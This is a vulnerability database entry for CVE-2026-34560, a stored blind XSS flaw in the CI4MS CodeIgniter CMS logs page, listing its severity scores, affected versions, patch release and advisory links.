CVE-2026-34560

CRITICAL

CI4MS: Logs Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS

Title source: cna

Description

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within logged data, it is rendered without proper output encoding. This issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored within application logs and only executes later when an administrator views the logs page. This issue has been patched in version 0.31.0.0.

References (2)

Core 2

Core References

X_Refsource_Confirm x_refsource_confirm

https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4

X_Refsource_Misc x_refsource_misc

https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0

Scores

CVSS v3 9.1

EPSS 0.0038

EPSS Percentile 29.7%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

CISA SSVC

Vulnrichment

Exploitation poc

Automatable no

Technical Impact partial

Details

CWE

CWE-79

Status published

Products (2)

ci4-cms-erp/ci4ms < 0.31.0.0 (2 CPE variants)

ci4-cms-erp/ci4ms 0 - 0.31.0.0Packagist

Published Apr 01, 2026

Tracked Since Apr 02, 2026